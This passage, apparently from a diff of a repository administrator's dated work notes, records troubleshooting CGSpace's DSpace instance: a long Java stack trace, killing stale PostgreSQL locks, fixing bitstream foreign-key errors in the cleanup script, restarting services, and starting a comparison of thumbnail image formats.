+	at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
+	at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy203.startElement(Unknown Source)
+	at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
+	at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
+	at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
+	at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
+	at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy203.startElement(Unknown Source)
+	at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
+	at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
+	at org.apache.cocoon.components.sax.AbstractXMLByteStreamInterpreter.parse(AbstractXMLByteStreamInterpreter.java:117)
+	at org.apache.cocoon.components.sax.XMLByteStreamInterpreter.deserialize(XMLByteStreamInterpreter.java:44)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:324)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:326)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:326)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
+	at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
+	at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
+	at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
+	at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
+	at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy198.generate(Unknown Source)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
+	at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
+	at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:439)
+	at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy191.process(Unknown Source)
+	at org.apache.cocoon.components.treeprocessor.sitemap.SerializeNode.invoke(SerializeNode.java:147)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+	at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+	at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+	at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+	at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+	at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+	at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+	at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+	at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+	at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+	at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+	at org.apache.cocoon.servlet.RequestProcessor.process(RequestProcessor.java:351)
+	at org.apache.cocoon.servlet.RequestProcessor.service(RequestProcessor.java:169)
+	at org.apache.cocoon.sitemap.SitemapServlet.service(SitemapServlet.java:84)
+	at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
+	at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:468)
+	at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
+	at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
+	at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
+	at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
+	at com.sun.proxy.$Proxy186.service(Unknown Source)
+	at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
+	at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1216)
+	at org.springframework.web.servlet.DispatcherServlet.processDispatchResult(DispatcherServlet.java:1001)
+	at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:945)
+	at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:867)
+	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:951)
+	at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:853)
+	at javax.servlet.http.HttpServlet.service(HttpServlet.java:647)
+	at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:827)
+	at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:113)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:160)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
+	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
+	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:492)
+	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:165)
+	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
+	at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:235)
+	at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:1025)
+	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451)
+	at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1201)
+	at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:654)
+	at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
+	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+	at java.lang.Thread.run(Thread.java:750)
+
    +
  • I don’t see anything on the DSpace issue tracker or mailing list so I asked about it on the DSpace Slack…
  • +
  • Peter said CGSpace was slow and I see a lot of locks from the XMLUI +
      +
    • I looked and found many locks that were many hours and days old so I killed some:
    • +
    +
  • +
+
$ psql < locks-age.sql | grep -E "[[:digit:]] days" | awk -F\| '{print $10}' | sort -u
+ 1050672
+ 1053773
+ 1054602
+ 1054702
+ 1056782
+ 1057629
+ 1057630
+$ psql < locks-age.sql | grep -E "[[:digit:]] days" | awk -F\| '{print $10}' | sort -u | xargs kill
+
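As an aside, instead of sending signals from the shell, PostgreSQL can be asked to terminate the offending backends itself. A minimal sketch of that variant (the one-day threshold and the idle-in-transaction filter are my own assumptions, not what locks-age.sql does):

$ psql -c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE state = 'idle in transaction' AND now() - state_change > interval '1 day'"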
    +
  • I’m also running a dspace cleanup -v, but it doesn’t seem to be finishing +
      +
    • I recall something like there being errors in the logs rather than on the command line in DSpace 6…
    • +
    • I found it in the DSpace log:
    • +
    +
  • +
+
2023-04-17 21:09:46,004 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (uuid)=(a7ddf477-1c04-4de0-9c7a-4d3c84a875bc) is still referenced from table "bundle".
+
    +
  • If I mark the primary bitstream as null manually the cleanup script continues until it finds a few more +
      +
    • I ended up with a long list of UUIDs to fix before the script would complete:
    • +
    +
  • +
+
$ psql -d dspace -c "update bundle set primary_bitstream_id=NULL where primary_bitstream_id in ('a7ddf477-1c04-4de0-9c7a-4d3c84a875bc', '9582b661-9c2d-4c86-be22-c3b0942b646a', '210a4d5d-3af9-46f0-84cc-682dd1431762', '51115f07-0a60-4988-8536-b9ebd2a5e15e', '0fc5021d-3264-413a-b2e2-74bda38a394e', '4704fa62-b8ab-4dfe-b7aa-0e4905f8412a')"
+
    +
  • This process ended up taking a few days because each iteration ran for over four hours before failing on the next UUID, sighhhhh
  • +
+

2023-04-18

+
    +
  • Regarding the item Abenet noticed yesterday that has a blank page and a nullPointerException +
      +
    • It appears OK on DSpace Test! https://dspacetest.cgiar.org/handle/10568/75611
    • +
    • And according to the REST API on CGSpace the item was modified on 2023-04-11, so last week…
    • +
    • According to the DSpace logs it was Francesca who edited the item last week, so I asked her for more information before I troubleshoot more
    • +
    +
  • +
+

2023-04-19

+
    +
  • I fixed the Bioversity item by deleting the 9781138781276.jpg bitstream via the REST API +
      +
    • I think Francesca might have changed the “format” of it?
    • +
    • Anyway, this item has a PDF so we have a proper thumbnail and don’t need that other journal cover one
    • +
    +
  • +
  • I noticed a URL for this Bioversity item redirects incorrectly +
      +
    • I had mentioned this to Maria and Francesca a few months ago but it seems to never have been resolved
    • +
    +
  • +
  • The dspace cleanup -v finally finished after a few days of running and stopping…
  • +
  • I decided to update the thumbnails in the Bioversity books collection because I saw a few old ones suffering from the CropBox issue
  • +
  • Also, all day there’s been a high load on CGSpace, with lots of locks in PostgreSQL +
      +
    • I had been waiting until the bitstream cleanup finished… now I might need to restart PostgreSQL to kill some old locks as something needs to give
    • +
    • I restarted PostgreSQL, but DSpace was still hanging on simple XMLUI options so I ended up restarting Tomcat
    • +
    +
  • +
  • Tag 544 ORCID identifiers with my script
  • +
  • I updated my generation-loss.sh and improved-dspace-thumbnails scripts to include thirty-five PDFs from CGSpace (up from twenty-four) to get a larger sample +
      +
    • Now starting to get some numbers comparing JPEG, WebP, and AVIF
    • +
    • First, out of curiosity, I checked the average ssimulacra2 scores at Q75, Q80, and Q92 for each format (a simplified sketch of the comparison loop follows the plot below):
    • +
    +
  • +
